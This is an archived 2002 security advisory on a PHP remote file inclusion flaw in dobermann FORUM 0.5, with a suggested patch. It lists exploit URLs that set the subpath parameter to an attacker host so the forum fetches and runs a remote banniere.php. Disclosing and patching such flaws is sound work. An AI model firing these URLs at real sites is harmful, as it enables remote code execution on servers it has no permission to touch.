Informations : °°°°°°°°°°°°°° Product : dobermann FORUM version : 0.5 website : http://www.le-dobermann.com Problem : Include file PHP Code/location : °°°°°°°°°°°°°°°°°°° entete.php enteteacceuil.php topic/entete.php : ------------------------------------------ <?php @include $subpath."banniere.php"; ?> ------------------------------------------ index.php newtopic.php : ------------------------ @require "config.php"; @include("entete.php"); ------------------------ Exploits : °°°°°°°°°° http://[target]/entete.php?subpath=http://[attacker]/ http://[target]/enteteacceuil.php?subpath=http://[attacker]/ http://[target]/topic/entete.php?subpath=http://[attacker]/ http://[target]/index.php?subpath=http://[attacker]/ http://[target]/newtopic.php?subpath=http://[attacker]/ with http://[attacker]/banniere.php Patch : °°°°°°° In files : ------------------ entete.php enteteacceuil.php topic/entete.php ------------------ replace the line : ------------------------------------------ <?php @include $subpath."banniere.php"; ?> ------------------------------------------ by : ------------------------------------------ <?php $banfile=$subpath."banniere.php"; if (file_exists($banfile)){ @include $banfile; } ?> ------------------------------------------ More details in french : http://www.frog-man.org/tutos/dobermannFORUM.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
This archive was generated by hypermail 2b30 : Mon Oct 28 2002 - 16:47:33 PST